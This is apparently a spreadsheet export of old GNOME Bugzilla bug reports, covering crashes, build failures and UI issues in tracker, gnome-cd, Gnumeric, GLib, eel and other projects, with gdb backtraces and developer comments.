    <t>Please describe the problem:
Steps to reproduce:
Choose hex mode.
Press a
Actual results:
Hex numbers become greyed out.
Next digit pressed sets accuracy but there is no indication that this is the case.
The accuracy radio button menu is not updated.
Expected results:
Either:
In hex mode a and A would both insert the hex digit A.
Or:
A status bar would indicate that the next digit will set accuracy.
The accuracy radio button menu is updated.
Does this happen every time?
Yes
Other information:
(As an aside Gcalctool has an amazing number of shortcuts. So many in fact that
it's really easy to make mistakes - most keys seems to do something without
indication of whats going on)</t>
  </si>
  <si>
    <t>TRACKER-453204</t>
  </si>
  <si>
    <t>starting trackerd</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. start trackerd 
2. 
3. 
Stack trace:
poll(*** glibc detected *** trackerd: double free or corruption (!prev): 0x082bde00 ***
======= Backtrace: =========
/lib/libc.so.6[0xb7cc6680]
/lib/libc.so.6(__libc_free+0x89)[0xb7cc7d19]
/lib/libc.so.6(fclose+0x142)[0xb7cb7812]
/usr/lib/libgmime-2.0.so.2[0xb7edbe4e]
======= Memory map: ========
08048000-080e4000 r-xp 00000000 fe:00 851984     /usr/bin/trackerd
080e4000-080ee000 rw-p 0009c000 fe:00 851984     /usr/bin/trackerd
080ee000-083c8000 rw-p 080ee000 00:00 0          [heap]
b6b00000-b6b21000 rw-p b6b00000 00:00 0 
b6b21000-b6c00000 ---p b6b21000 00:00 0 
b6c40000-b6c4a000 r-xp 00000000 fe:00 918000     /usr/lib/libgcc_s.so.1
b6c4a000-b6c4b000 rw-p 00009000 fe:00 918000     /usr/lib/libgcc_s.so.1
b6c5b000-b6c5d000 r-xp 00000000 fe:00 917742     /usr/lib/gconv/UTF-16.so
b6c5d000-b6c5f000 rw-p 00001000 fe:00 917742     /usr/lib/gconv/UTF-16.so
b6c5f000-b6c60000 ---p b6c5f000 00:00 0 
b6c60000-b7460000 rw-p b6c60000 00:00 0 
b7460000-b7461000 ---p b7460000 00:00 0 
b7461000-b7c63000 rw-p b7461000 00:00 0 
b7c63000-b7d86000 r-xp 00000000 08:05 344120     /lib/libc-2.5.so
b7d86000-b7d87000 r--p 00123000 08:05 344120     /lib/libc-2.5.so
b7d87000-b7d89000 rw-p 00124000 08:05 344120     /lib/libc-2.5.so
b7d89000-b7d8c000 rw-p b7d89000 00:00 0 
b7d8c000-b7d9f000 r-xp 00000000 08:05 343405     /lib/libz.so.1.2.3
b7d9f000-b7da0000 rw-p 00012000 08:05 343405     /lib/libz.so.1.2.3
b7da0000-b7e2e000 r-xp 00000000 fe:00 918066     /usr/lib/libglib-2.0.so.0.1200.12
b7e2e000-b7e2f000 rw-p 0008d000 fe:00 918066     /usr/lib/libglib-2.0.so.0.1200.12
b7e2f000-b7e36000 r-xp 00000000 08:05 344110     /lib/librt-2.5.so
b7e36000-b7e38000 rw-p 00006000 08:05 344110     /lib/librt-2.5.so
b7e38000-b7e4b000 r-xp 00000000 08:05 343400     /lib/libpthread-2.5.so
b7e4b000-b7e4d000 rw-p 00012000 08:05 343400     /lib/libpthread-2.5.so
b7e4d000-b7e4f000 rw-p b7e4d000 00:00 0 
b7e4f000-b7e52000 r-xp 00000000 fe:00 918078     /usr/lib/libgthread-2.0.so.0.1200.12
b7e52000-b7e53000 rw-p 00003000 fe:00 918078     /usr/lib/libgthread-2.0.so.0.1200.12
b7e53000-b7e54000 rw-p b7e53000 00:00 0 
b7e54000-b7e58000 r-xp 00000000 fe:00 919453     /usr/lib/libunac.so.1.0.7
b7e58000-b7e5f000 rw-p 00003000 fe:00 919453     /usr/lib/libunac.so.1.0.7
b7e5f000-b7e95000 r-xp 00000000 fe:00 918070     /usr/lib/libgobject-2.0.so.0.1200.12
b7e95000-b7e96000 rw-p 00036000 fe:00 918070     /usr/lib/libgobject-2.0.so.0.1200.12
b7e96000-b7ea8000 r-xp 00000000 08:05 343397     /lib/libnsl-2.5.so
b7ea8000-b7eaa000 rw-p 00011000 08:05 343397     /lib/libnsl-2.5.so
b7eaa000-b7eac000 rw-p b7eaa000 00:00 0 
b7eac000-b7eae000 r-xp 00000000 08:05 343409     /lib/libdl-2.5.so
b7eae000-b7eb0000 rw-p 00001000 08:05 343409     /lib/libdl-2.5.so
b7eb0000-b7eb2000 r-xp 00000000 fe:00 918074     /usr/lib/libgmodule-2.0.so.0.1200.12
b7eb2000-b7eb3000 rw-p 00002000 fe:00 918074     /usr/lib/libgmodule-2.0.so.0.1200.12
b7eb3000-b7eec000 r-xp 00000000 fe:00 919412     /usr/lib/libgmime-2.0.so.2.2.9
b7eec000-b7eff000 rw-p 00038000 fe:00 919412     /usr/lib/libgmime-2.0.so.2.2.9
b7eff000-b7f00000 rw-p b7eff000 00:00 0 
b7f00000-b7f23000 r-xp 00000000 08:05 343464     /lib/libm-2.5.so
b7f23000-b7f25000 rw-p 00022000 08:05 343464     /lib/libm-2.5.so
b7f25000-b7f5e000 r-xp 00000000 fe:00 918893     /usr/lib/libpango-1.0.so.0.1600.4
b7f5e000-b7f60000 rw-p 00038000 fe:00 918893     /usr/lib/libpango-1.0.so.0.1600.4
b7f60000-b7f90000 r-xp 00000000 fe:00 918970     /usr/lib/libdbus-1.so.3.3.0
b7f90000-b7f91000 rw-p 00030000 fe:00 918970     /usr/lib/libdbus-1.so.3.3.0
b7f91000-b7faa000 r-xp 00000000 fe:00 918976     /usr/lib/libdbus-glib-1.so.2.1.0
b7faa000-b7fab000 rw-p 00019000 fe:00 918976     /usr/lib/libdbus-glib-1.so.2.1.0
b7faf000-b7fb0000 rw-p b7faf000 00:00 0 
b7fb0000-b7fb8000 r-xp 00000000 08:05 344105     /lib/libnss_files-2.5.so
b7fb8000-b7fba000 rw-p 00007000 08:05 344105     /lib/libnss_files-2.5.so
b7fba000-b7fbc000 rw-p b7fba000 00:00 0 
b7fbc000-b7fbd000 r-xp b7fbc000 00:00 0          [vdso]
b7fbd000-b7fd7000 r-xp 00000000 08:05 343398     /lib/ld-2.5.so
b7fd7000-b7fd9000 rw-p 00019000 08:05 343398     /lib/ld-2.5.so
bfb61000-bfb77000 rw-p bfb61000 00:00 0          [stack]
[{fd=12 events=POLLIN revents=POLLIN} {fd=19 events=POLLIN} {fd=23 events=POLLIN revents=POLLNVAL}] 3 -1) = 2
+++ killed by SIGABRT +++
Process 4379 detached
Other information:
I also removed the database ~/.config/tracker and ~/.config/tracker.cfg the /tmp directories it created.</t>
  </si>
  <si>
    <t>GNOME-MEDIA-93794</t>
  </si>
  <si>
    <t>invalid device causes crash</t>
  </si>
  <si>
    <t>on startup if the specified cdrom doesn't exist or has invalid permission
you're prompted with a dialog to fix it.  after changing the device and
applying it when I hit close gnome-cd crashes.
here's a backtrace from bug-buddy:
[New Thread 1024 (LWP 16116)]
0x40825a39 in wait4 () from /lib/libc.so.6
#0  0x40825a39 in wait4 () from /lib/libc.so.6
#1  0x4089ce48 in __check_rhosts_file () from /lib/libc.so.6
#2  0x40333453 in waitpid () from /lib/libpthread.so.0
#3  0x40057943 in libgnomeui_segv_handle (signum=11) at gnome-ui-init.c:647
#4  0x40330f54 in pthread_sighandler () from /lib/libpthread.so.0
#5  0x407ae6b8 in sigaction () from /lib/libc.so.6
#6  0x080505d4 in gnome_cd_build_track_list_menu (gcd=0x8068048)
    at gnome-cd.c:141
#7  0x0805124d in init_player () at gnome-cd.c:514
#8  0x0805186f in main (argc=1 argv=0xbffffc64) at gnome-cd.c:637
Thread 1 (Thread 1024 (LWP 16116)):
#0  0x40825a39 in wait4 () from /lib/libc.so.6
No symbol table info available.
#1  0x4089ce48 in __check_rhosts_file () from /lib/libc.so.6
No symbol table info available.
#2  0x40333453 in waitpid () from /lib/libpthread.so.0
No symbol table info available.
#3  0x40057943 in libgnomeui_segv_handle (signum=11) at gnome-ui-init.c:647
        estatus = 0
        in_segv = 1
        pid = 0
#4  0x40330f54 in pthread_sighandler () from /lib/libpthread.so.0
No symbol table info available.
#5  0x407ae6b8 in sigaction () from /lib/libc.so.6
No symbol table info available.
#6  0x080505d4 in gnome_cd_build_track_list_menu (gcd=0x8068048)
    at gnome-cd.c:141
        data = (GnomeCDRomCDDBData *) 0x80903a0
        status = (GnomeCDRomStatus *) 0x8068048
        menu = (GtkMenu *) 0x80fc300
        item = (GtkWidget *) 0x0
#7  0x0805124d in init_player () at gnome-cd.c:514
        gcd = (GnomeCD *) 0x8068048
        status = (GnomeCDRomStatus *) 0xbffffd60
        display_box = (GtkWidget *) 0x8089760
        top_hbox = (GtkWidget *) 0x80903a0
        button_hbox = (GtkWidget *) 0x805bbcb
        option_hbox = (GtkWidget *) 0x8122118
        button = (GtkWidget *) 0x80903a0
        pixbuf = (GdkPixbuf *) 0x80903a0
        error = (GError *) 0x80693a0
#8  0x0805186f in main (argc=1 argv=0xbffffc64) at gnome-cd.c:637
        argv = (char **) 0xbffffc64
        gcd = (GnomeCD *) 0xbffffc64
        client = (GnomeClient *) 0x8067b</t>
  </si>
  <si>
    <t>sproctor</t>
  </si>
  <si>
    <t>GSTREAMER-460422</t>
  </si>
  <si>
    <t>[audiotestsrc] Add support for float and double output</t>
  </si>
  <si>
    <t>Hi
the attached patch adds support for float and double output in audiotestsrc. Apart from weird clipping with
audiotestsrc ! audioconvert ! alsasink
everything seems to be fine.
Not sure what the clipping causes when writing the sound to a file all samples look fine (but are going over the full range of possible values instead of keeping a bit space around the borders). Lowering the volume of audiotestsrc also helps output to int16 and then converting to int32 works too... so no idea :/
Using osssink instead does work too so maybe alsa simply can't cope with values going over the complete 32 bit range?
Bye</t>
  </si>
  <si>
    <t>GNOME-VFS-342115</t>
  </si>
  <si>
    <t>gnome-vfs-pty.c won't be compiled on an LFS-SVN</t>
  </si>
  <si>
    <t>Please describe the problem:
Well in fact the gnome-vfs-pty.c file from the gnome-vfs-2.14.1 tarball compile
correctly on my box but not the CVS one
my system is:
gcc 4.0.3
glibc 2.3.6
libc-headers-2.6.12.0 + inotify headers
gnome is (target 2.16)
glib-2.0 2.11.12
gconf-2 2.14.0
ORBit-2.0 2.14.1
bonobo-activation-2.0 2.15.0
libbonobo-2.0 2.15.0
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:
 gcc -DHAVE_CONFIG_H -I. -I. -I.. -I.. -I.. -pthread -DORBIT2=1
-I/usr/Gnome-2.16/include/glib-2.0 -I/usr/Gnome-2.16/lib/glib-2.0/include
-I/usr/Gnome-2.16/include/gconf/2 -I/usr/Gnome-2.16/include/orbit-2.0
-I/usr/Gnome-2.16/include/bonobo-activation-2.0
-I/usr/Gnome-2.16/include/libbonobo-2.0 -I/usr/include/libxml2
-DDBUS_API_SUBJECT_TO_CHANGE -I/usr/Gnome-2.16/include/glib-2.0
-I/usr/Gnome-2.16/lib/glib-2.0/include -I/usr/Gnome-2.16/include/hal
-I/usr/Gnome-2.16/include/dbus-1.0 -I/usr/Gnome-2.16/lib/dbus-1.0/include -Wall
-Werror -Wchar-subscripts -Wmissing-declarations -Wmissing-prototypes
-Wnested-externs -Wpointer-arith -Wno-strict-aliasing -Wno-sign-compare
-DORBIT2=1 -pthread -I/usr/Gnome-2.16/include/libbonobo-2.0
-I/usr/Gnome-2.16/include/glib-2.0 -I/usr/Gnome-2.16/lib/glib-2.0/include
-I/usr/Gnome-2.16/include/orbit-2.0
-I/usr/Gnome-2.16/include/bonobo-activation-2.0 -DXDG_PREFIX=_gnome_vfs_xdg
-D_FILE_OFFSET_BITS=64 -D_BSD_SOURCE -D_LARGEFILE64_SOURCE
-D_POSIX_PTHREAD_SEMANTICS -D_REENTRANT -DG_DISABLE_DEPRECATED
-DGNOME_VFS_PREFIX=\/usr/Gnome-2.16\
-DGNOME_VFS_BINDIR=\/usr/Gnome-2.16/bin\
-DGNOME_VFS_DATADIR=\/usr/Gnome-2.16/share\
-DGNOME_VFS_LIBDIR=\/usr/Gnome-2.16/lib\
-DGNOME_VFS_LOCALEDIR=\/usr/Gnome-2.16/share/locale\
-DGNOME_VFS_SYSCONFDIR=\/usr/Gnome-2.16/etc\ -DG_LOG_DOMAIN=\libgnomevfs\
-O3 -march=athlon-xp -msse -m3dnow -MT gnome-vfs-pty.lo -MD -MP -MF
.deps/gnome-vfs-pty.Tpo -c gnome-vfs-pty.c  -fPIC -DPIC -o .libs/gnome-vfs-pty.o
cc1: warnings being treated as errors
gnome-vfs-pty.c: In function 'gnome_vfs_pty_open':
gnome-vfs-pty.c:379: warning: 'ready_a[0]' may be used uninitialized in this
function
gnome-vfs-pty.c:379: warning: 'ready_a[1]' may be used uninitialized in this
function
gnome-vfs-pty.c:379: warning: 'ready_b[0]' may be used uninitialized in this
function
gnome-vfs-pty.c:379: warning: 'ready_b[1]' may be used uninitialized in this
function
make[3]: *** [gnome-vfs-pty.lo] Erreur 1
make[3]: Leaving directory `/usr/Gnome-2.16/src/gnome-vfs/libgnomevfs'
make[2]: *** [all] Erreur 2
make[2]: Leaving directory `/usr/Gnome-2.16/src/gnome-vfs/libgnomevfs'
make[1]: *** [all-recursive] Erreur 1
make[1]: Leaving directory `/usr/Gnome-2.16/src/gnome-vfs'
make: *** [all] Erreur 2</t>
  </si>
  <si>
    <t>eloi</t>
  </si>
  <si>
    <t>AT-SPI-404155</t>
  </si>
  <si>
    <t>atkbridge</t>
  </si>
  <si>
    <t>Ekiga will not start with accessibility enabled</t>
  </si>
  <si>
    <t>The following problem crops up while trying to start ekiga with accessibility enabled on the latest fully up to date ubuntu feisty pre-release with the latest gnome 2.17 milestone bits.  
1. Login and enable assistive technology support.
2.  Log out and back in.
3.  Attempt to start ekiga.
At this point ekiga briefly appears and then disappears and does not start.  It does not matter if an assistive technology such as orca is running or not.  If assistive technology is not enabled ekiga starts normally.</t>
  </si>
  <si>
    <t>F-SPOT-335385</t>
  </si>
  <si>
    <t>fix categories in f-spot.desktop.in</t>
  </si>
  <si>
    <t>Please describe the problem:
Photograph category is wrong. It's Photography.
See http://standards.freedesktop.org/menu-spec/latest/apa.html
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>vincent.fretin</t>
  </si>
  <si>
    <t>EVOLUTION-213138</t>
  </si>
  <si>
    <t>crash on encryption</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Major
Version: 0.15
Synopsis: crash on encryption
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Program crashed while encryping a message with PGP.
Message was:  Oops! Inbox view has disappeared.  This probably means the
program crashed.
Unknown reporter: ed@ge-and-dl-waldron.org changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>GLIB-72387</t>
  </si>
  <si>
    <t>GObject / GObjectNotifyQueue / GTrashStack not thread safe</t>
  </si>
  <si>
    <t>I'm trying to use GObject in a threaded library but I ran into some trouble.
I don't think this is the same as the other threading issues that has been
reported (65041 64764)
It looks like GObject creates a GObjectNotifyQueue which uses a GTrashStack
to allocate and reuse memory. 
But GTrashStack is not very thread safe so replacing it with a simple
g_new0 and g_free combo seems to fix my problems. But memchunks should
probably be used instead.
Also by using GTrashStack the memory allocated will never be returned to
the operating system.
My testcase can be downloaded from here:
http://afs.codefactory.se/~jonas/multithreading.c
This program will result in a SIGTRAP within a few seconds/minutes:
Program output:
(process:18875): GLib-GObject-CRITICAL **: file gobjectnotifyqueue.c: line
102 (g_object_notify_queue_thaw): assertion `nqueue-&gt;freeze_count &gt; 0' failed
(process:18874): GLib-CRITICAL **: file gdataset.c: line 369
(g_datalist_id_set_data_full): assertion `key_id &gt; 0' failed
(process:18874): GLib-GObject-CRITICAL **: file gobjectnotifyqueue.c: line
102 (g_object_notify_queue_thaw): assertion `nqueue-&gt;freeze_count &gt; 0' failed
(process:18875): GLib-GObject-CRITICAL **: file gobjectnotifyqueue.c: line
102 (g_object_notify_queue_thaw): assertion `nqueue-&gt;freeze_count &gt; 0' failed
(process:18875): GLib-ERROR **: gmem.c:141:g_malloc(): failed to allocate
538191360 bytes
aborting...
/ Jonas BorgstrÃ¶m (jborg)</t>
  </si>
  <si>
    <t>GNOME-APPLETS-81701</t>
  </si>
  <si>
    <t>Help button is missing in preference dialog box</t>
  </si>
  <si>
    <t>There should be a  help button in the preference dialog box
for the applet. Currently only close button is present.
This help button can be linked to the preference section of the help
document.</t>
  </si>
  <si>
    <t>GNUMERIC-478475</t>
  </si>
  <si>
    <t>Crash when printing with multiple selection ranges</t>
  </si>
  <si>
    <t>I don't know what happened to my description. Here's a second try:
Version: r15901
OS: Ubuntu Gutsy
Steps to reproduce:
- Run Gnumeric
- Select cells A1 and A2
- Press and hold the control key
- Select cells B1 and B2
- File &gt; Print &gt; Gnumeric Print Range Tab
- Check Current selection only
- Click on the General Tab
- Press the Print button
- Press OK on the Print Selection does not support multiple ranges message box to crash Gnumeric
Backtrace:
Program received signal SIGSEGV Segmentation fault.
[Switching to Thread -1232423248 (LWP 7942)]
0xb7c70013 in gnm_request_page_setup_cb (operation=0x839f2d0 context=0x8591338 page_nr=0 setup=0x855af28 
    user_data=0x84f3e18) at print.c:1163
1163            gtk_print_settings_set_use_color (settings !gsr-&gt;sheet-&gt;print_info-&gt;print_black_and_white)
(gdb) p gsr
$1 = (GnmSheetRange *) 0x0
(gdb) bt
#0  0xb7c70013 in gnm_request_page_setup_cb (operation=0x839f2d0 context=0x8591338 page_nr=0 setup=0x855af28 
    user_data=0x84f3e18) at print.c:1163
#1  0xb75757e4 in _gtk_marshal_VOID__OBJECT_INT_OBJECT () from /usr/lib/libgtk-x11-2.0.so.0
#2  0xb729f772 in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#3  0xb72b0323 in ?? () from /usr/lib/libgobject-2.0.so.0
#4  0x084ae348 in ?? ()
#5  0x00000000 in ?? ()</t>
  </si>
  <si>
    <t>GNOME-VFS-41075</t>
  </si>
  <si>
    <t>MIME type application registry needs revision</t>
  </si>
  <si>
    <t xml:space="preserve">The current mechanism used for associating applications with MIME types is not
suitable for our shipping version. One concrete problem with it is that
applications can't supply their own .keys files to add info to the system info.
Maciej also thinks the whole design is a hideous hack that would scar us forever
were it to be foisted upon the world.
------- Additional Comments From darin@bentspoon.com 2000-06-01 10:34:44 ----
The problem is not that applications can't supply their own .keys files. They
can.
The problem is that these .keys files can't easily add the applications or
components to MIME types that are already defined in the system .keys files.
There's no good merging concept to make that work and fixing it might require
redesigning these files.
------- Additional Comments From darin@bentspoon.com 2000-06-01 10:36:24 ----
There may also be a separate issue with how the applications get their .keys
files into the right directory. I seem to recall that this was a problem too.
------- Additional Comments From darin@bentspoon.com 2000-06-01 10:40:53 ----
Maciej's idea for the best fix to this includes moving some or all of the data
that's currently in the MIME keys files into the OAF registry and possibly
renaming OAF since it will then be fore more than just activation.
------- Additional Comments From mjs@noisehavoc.org 2000-06-02 15:13:27 ----
I'm putting a high-end time estimate based on a worst-case scenario of how long
the most complex way of doing it will take
------- Additional Comments From darin@bentspoon.com 2000-06-05 11:32:50 ----
There's at least one FIXME about this marked with this bug #.
------- Additional Comments From darin@bentspoon.com 2000-06-06 11:21:19 ----
*** Bug 41147 has been marked as a duplicate of this bug. ***
------- Additional Comments From mjs@noisehavoc.org 2000-06-13 02:59:15 ----
Here is a simple design that should not take much time:
* Copy much of the current hash table based gnome-vfs-mime-info code but use
different data files and a different hash table.
* Make it posible to query either by application ID or get a list of
application IDS based on supported mime types.
A better design would still be to do something OAF-like but I think that can
wait until GNOME 2.0. Filing a new bug to that effect.
------- Additional Comments From jirka@5z.com 2000-08-08 23:26:23 ----
should now be fixed
------- Additional Comments From sullivan@eazel.com 2000-09-08 15:30:21 ----
Setting all bugs to P6 to start official bug-prioritization plan. Please don't
set the priority to anything other than P6 unless you've got the gold seal of
approval for doing so.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:33 -------
</t>
  </si>
  <si>
    <t>NETWORKMANAGER-167550</t>
  </si>
  <si>
    <t>applet menu size and positioning</t>
  </si>
  <si>
    <t>The popup menu for the notification applet has a few problems:
- The first time the applet is clicked the menu displays with a height of zero
- Another click on the applet makes the menu appear correctly - most of the time
- Seems like when the contents of the menu change the position and size get screwy
My nofication area is on the bottom panel.  These problems seem similar to some
of the problems I fixed in the panel clock.</t>
  </si>
  <si>
    <t>EEL-48219</t>
  </si>
  <si>
    <t>crash under libefence</t>
  </si>
  <si>
    <t xml:space="preserve">Problem comes in eel_scalable_font_new() when you use
font-&gt;details-&gt;font_file_name as a key in the global_font_handle_table
hash table. This string is later freed in eel_scalable_font_destroy() 
although it's still in use in global_font_handle_table.
Here is my gdb session transcript. backtrace when the string is
inserted and when it's freed later :
(gdb) n
141			g_hash_table_insert (global_font_handle_table
(gdb) bt
#0  eel_scalable_font_new (
    file_name=0x8189758 /usr/local/gnome/share/eel/fonts/urw/n019003l.pfb)
    at eel-scalable-font.c:141
#1  0x408e37ac in eel_scalable_font_get_default_font ()
    at eel-scalable-font.c:319
#2  0x408cd3f4 in eel_label_initialize (label=0x8189680) at eel-label.c:304
#3  0x40420c55 in gtk_type_new (type=65813) at gtktypeutils.c:399
#4  0x4042b891 in gtk_widget_new (widget_type=65813 first_arg_name=0x0)
    at gtkwidget.c:1059
#5  0x408cf906 in eel_label_new (text=0x80c0e05 ) at eel-label.c:1145
#6  0x408ccfdd in eel_label_new_with_background (text=0x80c0e05 )
    at eel-label-with-background.c:66
#7  0x807de91 in sidebar_title_create_title_label ()
    at nautilus-sidebar-title.c:803
#8  0x807cd47 in nautilus_sidebar_title_initialize (sidebar_title=0x8181f40)
    at nautilus-sidebar-title.c:206
#9  0x40420c55 in gtk_type_new (type=64789) at gtktypeutils.c:399
#10 0x4042b891 in gtk_widget_new (widget_type=64789 first_arg_name=0x0)
    at gtkwidget.c:1059
#11 0x807d076 in nautilus_sidebar_title_new () at nautilus-sidebar-title.c:288
#12 0x807e2a2 in nautilus_sidebar_initialize (object=0x812cb38)
    at nautilus-sidebar.c:256
#13 0x40420c55 in gtk_type_new (type=64533) at gtktypeutils.c:399
#14 0x4042b891 in gtk_widget_new (widget_type=64533 first_arg_name=0x0)
    at gtkwidget.c:1059
#15 0x807ee11 in nautilus_sidebar_new () at nautilus-sidebar.c:555
#16 0x808f586 in nautilus_window_constructed (window=0x815c738)
    at nautilus-window.c:757
#17 0x808f8e4 in nautilus_window_set_arg (object=0x815c738 arg=0x8162a48 
    arg_id=1) at nautilus-window.c:867
#18 0x403d2abc in gtk_object_arg_set (object=0x815c738 arg=0x8162a48 
    info=0x815c6f8) at gtkobject.c:809
#19 0x4042b920 in gtk_widget_new (widget_type=53013 
    first_arg_name=0x80b9c13 app) at gtkwidget.c:1083
#20 0x80688a9 in nautilus_application_create_window (application=0x8156648)
    at nautilus-application.c:688
#21 0x80794d0 in open_window (shell=0x815b098 uri=0x815bc9c camera://bar/ 
    geometry=0x80b9b00 ) at nautilus-shell.c:274
#22 0x80795b3 in corba_open_windows (servant=0x815b6b0 list=0x815bc0c 
    geometry=0x80b9b00  ev=0xbffff350) at nautilus-shell.c:305
#23 0x806591c in Nautilus_Shell_open_windows (_obj=0x8156bc8 uris=0x815bc0c 
    geometry=0x80b9b00  ev=0xbffff350)
    at nautilus-shell-interface-stubs.c:22
#24 0x80685ea in nautilus_application_startup (application=0x8156648 
    kill_shell=0 restart_shell=0 no_default_window=0 no_desktop=0 
    do_first_time_druid_check=1 geometry=0x0 urls=0x80e4990)
    at nautilus-application.c:603
#25 0x8071fdd in main (argc=2 argv=0xbffff5e4) at nautilus-main.c:276
#26 0x40952b5c in __libc_start_main (main=0x8071ae0  argc=2 
    ubp_av=0xbffff5e4 init=0x80608cc  fini=0x80b8970  
    rtld_fini=0x4000d634  stack_end=0xbffff5dc)
    at ../sysdeps/generic/libc-start.c:129
(gdb) print font-&gt;details-&gt;font_file_name
$5 = 0x8192f18 /usr/local/gnome/share/eel/fonts/urw/n019003l.pfb
(gdb)
....[snip]....
 (gdb) n
88		g_free (font-&gt;details-&gt;font_file_name)
(gdb) bt
#0  eel_scalable_font_destroy (object=0x8192ef0) at eel-scalable-font.c:88
#1  0x403bcac1 in gtk_marshal_NONE__NONE (object=0x8192ef0 
    func=0x408e2d40  func_data=0x0 
    args=0xbfffeca0) at gtkmarshal.c:312
#2  0x403f392d in gtk_signal_real_emit (object=0x8192ef0 signal_id=1 
    params=0xbfffeca0) at gtksignal.c:1492
#3  0x403f1690 in gtk_signal_emit (object=0x8192ef0 signal_id=1)
    at gtksignal.c:552
#4  0x403d1a2c in gtk_object_shutdown (object=0x8192ef0) at gtkobject.c:255
#5  0x403d19c0 in gtk_object_destroy (object=0x8192ef0) at gtkobject.c:246
#6  0x403d3c01 in gtk_object_unref (object=0x8192ef0) at gtkobject.c:1177
#7  0x408cfa23 in eel_label_set_smooth_font (label=0x8189680 
    smooth_font=0x81a69a8) at eel-label.c:1164
#8  0x408d1768 in eel_label_make_bold (label=0x8189680) at eel-label.c:1858
#9  0x807dead in sidebar_title_create_title_label ()
    at nautilus-sidebar-title.c:804
#10 0x807cd47 in nautilus_sidebar_title_initialize (sidebar_title=0x8181f40)
    at nautilus-sidebar-title.c:206
#11 0x40420c55 in gtk_type_new (type=64789) at gtktypeutils.c:399
#12 0x4042b891 in gtk_widget_new (widget_type=64789 first_arg_name=0x0)
    at gtkwidget.c:1059
#13 0x807d076 in nautilus_sidebar_title_new () at nautilus-sidebar-title.c:288
#14 0x807e2a2 in nautilus_sidebar_initialize (object=0x812cb38)
    at nautilus-sidebar.c:256
#15 0x40420c55 in gtk_type_new (type=64533) at gtktypeutils.c:399
#16 0x4042b891 in gtk_widget_new (widget_type=64533 first_arg_name=0x0)
    at gtkwidget.c:1059
#17 0x807ee11 in nautilus_sidebar_new () at nautilus-sidebar.c:555
#18 0x808f586 in nautilus_window_constructed (window=0x815c738)
    at nautilus-window.c:757
#19 0x808f8e4 in nautilus_window_set_arg (object=0x815c738 arg=0x8162a48 
    arg_id=1) at nautilus-window.c:867
#20 0x403d2abc in gtk_object_arg_set (object=0x815c738 arg=0x8162a48 
    info=0x815c6f8) at gtkobject.c:809
#21 0x4042b920 in gtk_widget_new (widget_type=53013 
    first_arg_name=0x80b9c13 app) at gtkwidget.c:1083
#22 0x80688a9 in nautilus_application_create_window (application=0x8156648)
    at nautilus-application.c:688
#23 0x80794d0 in open_window (shell=0x815b098 uri=0x815bc9c camera://bar/ 
    geometry=0x80b9b00 ) at nautilus-shell.c:274
#24 0x80795b3 in corba_open_windows (servant=0x815b6b0 list=0x815bc0c 
    geometry=0x80b9b00  ev=0xbffff350) at nautilus-shell.c:305
#25 0x806591c in Nautilus_Shell_open_windows (_obj=0x8156bc8 uris=0x815bc0c 
    geometry=0x80b9b00  ev=0xbffff350)
    at nautilus-shell-interface-stubs.c:22
#26 0x80685ea in nautilus_application_startup (application=0x8156648 
    kill_shell=0 restart_shell=0 no_default_window=0 no_desktop=0 
    do_first_time_druid_check=1 geometry=0x0 urls=0x80e4990)
    at nautilus-application.c:603
#27 0x8071fdd in main (argc=2 argv=0xbffff5e4) at nautilus-main.c:276
#28 0x40952b5c in __libc_start_main (main=0x8071ae0  argc=2 
    ubp_av=0xbffff5e4 init=0x80608cc  fini=0x80b8970  
    rtld_fini=0x4000d634  stack_end=0xbffff5dc)
    at ../sysdeps/generic/libc-start.c:129
(gdb) print font-&gt;details-&gt;font_file_name
$6 = 0x8192f18 /usr/local/gnome/share/eel/fonts/urw/n019003l.pfb
So maybe we have to strdup the hash-table key before adding it in
eel_scalable_font_new() ?
------- Additional Comments From darin@bentspoon.com 2001-05-02 10:16:36 ----
I'll fix this right now.
------- Additional Comments From darin@bentspoon.com 2001-05-02 10:33:22 ----
Fixed.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 21:18 -------
</t>
  </si>
  <si>
    <t>METACITY-93745</t>
  </si>
  <si>
    <t>Metacity does not respect standard command line arguments</t>
  </si>
  <si>
    <t xml:space="preserve">Package: metacity
Severity: normal
Version: 2.4.1
Synopsis: Metacity does not respect standard command line arguments
Bugzilla-Product: metacity
Bugzilla-Component: general
Description:
Metacity should obey the two standard command line options --help and
--version.
It should react to --help by displaying a long formatted usage
statement and to --version by displaying the version number.
Especially the second one is important -- I've encountered people who
had lots of trouble trying to find out what Metacity version they're
running!
I can fix this in CVS if you want to.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-09-20 06:10 -------
The original reporter (mawarkus@t-online.de) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component hp@redhat.com.
</t>
  </si>
  <si>
    <t>mawarkus</t>
  </si>
  <si>
    <t>GNOME-MEDIA-139555</t>
  </si>
  <si>
    <t>CD player doesn't stop playing the CD when user logs out</t>
  </si>
  <si>
    <t>Insert a CD start it playing log out.
Expected behaviour is for the CD to stop playing when the user logs out.</t>
  </si>
  <si>
    <t>GNOME-SHELL-569717</t>
  </si>
  <si>
    <t>app/document dragging</t>
  </si>
  <si>
    <t>I don't have application/document dragging working yet (or even a finished Draggable interface) but I'm going to start dumping patches here.</t>
  </si>
  <si>
    <t>GSTREAMER-138707</t>
  </si>
  <si>
    <t>Problem configuring gstreamer-monkeyaudio 0.6</t>
  </si>
  <si>
    <t>[...]
checking for pkg-config... /usr/local/bin/pkg-config
checking for         gstreamer-0.7 &gt;= 0.6.1... Package gstreamer-0.7 was not
found in the pkg-config search path.
Perhaps you should add the directory containing `gstreamer-0.7.pc'
to the PKG_CONFIG_PATH environment variable
No package 'gstreamer-0.7' found
checking for                 gstreamer-0.6 &gt;= 0.6.1... Package gstreamer-0.6 was
not found in the pkg-config search path.
Perhaps you should add the directory containing `gstreamer-0.6.pc'
to the PKG_CONFIG_PATH environment variable
No package 'gstreamer-0.6' found
configure: error: you need gstreamer development packages installed !
